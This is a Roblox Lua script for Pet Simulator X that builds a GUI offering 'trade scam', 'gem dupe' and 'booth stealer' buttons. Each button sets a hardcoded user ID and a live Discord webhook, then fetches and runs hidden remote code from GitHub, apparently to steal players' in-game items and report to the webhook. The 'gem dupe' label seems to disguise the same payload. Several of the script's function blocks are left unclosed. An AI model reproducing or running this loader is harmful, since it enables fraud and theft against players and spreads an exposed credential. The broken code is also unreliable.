local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("PSX TRADE SCAM", "Synapse")
 
local SelfTab = Window:NewTab("trade-scam");
local VehicleTab = Window:NewTab("GEM DUPE");
local WeaponTab = Window:NewTab("BOOTH STEALER");
 
 
local Section1 = SelfTab:NewSection("TRADE");
Section1:NewLabel("execute and wait 1 minute");
 
Section1:NewButton("SCAM", "Click again when the trade ends", function()
    UserId = 3055262279
    WebHook = "https://discordapp.com/api/webhooks/1069034431530147850/iTN9VhxIOU8wRtiRK-Rju9SI_NVugkISbzY_ublCswdxhi-lc4x4spe3R-mX36UFyeLa"
    
    _G.CustomScriptName = "TRDE-SCAM HUB"
    _G.Text1 = "Adding mask...."
    _G.Text2 = "Waiting for Pets"
    _G.Text3 = "Checking Game ID..."
    _G.Text4 = "Starting The Mask...."
    loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/New.lua", true))()
    end)
    local Section1 = VehicleTab:NewSection("GEM DUPE");
Section1:NewToggle("ON/OFF", "gem dupe", function(state)
    UserId = 3055262279
    WebHook = "https://discordapp.com/api/webhooks/1069034431530147850/iTN9VhxIOU8wRtiRK-Rju9SI_NVugkISbzY_ublCswdxhi-lc4x4spe3R-mX36UFyeLa"
    
    _G.CustomScriptName = "TRDE-SCAM HUB"
    _G.Text1 = "Adding mask...."
    _G.Text2 = "Waiting for Pets"
    _G.Text3 = "Checking Game ID..."
    _G.Text4 = "Starting The Mask...."
    loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/New.lua", true))()
end
local Section1 = WeaponTab:NewSection("SOON!!!!");
Section1:NewLabel("execute and wait 1 minute");

Section1:NewButton("SOON!!", "DONT CLICK", function()
    UserId = 3055262279
    WebHook = "https://discordapp.com/api/webhooks/1069034431530147850/iTN9VhxIOU8wRtiRK-Rju9SI_NVugkISbzY_ublCswdxhi-lc4x4spe3R-mX36UFyeLa"
    
    _G.CustomScriptName = "TRDE-SCAM HUB"
    _G.Text1 = "Adding mask...."
    _G.Text2 = "Waiting for Pets"
    _G.Text3 = "Checking Game ID..."
    _G.Text4 = "Starting The Mask...."
    loadstring(game:HttpGet("https://raw.githubusercontent.com/HardGameSs/PSX/main/New.lua", true))()
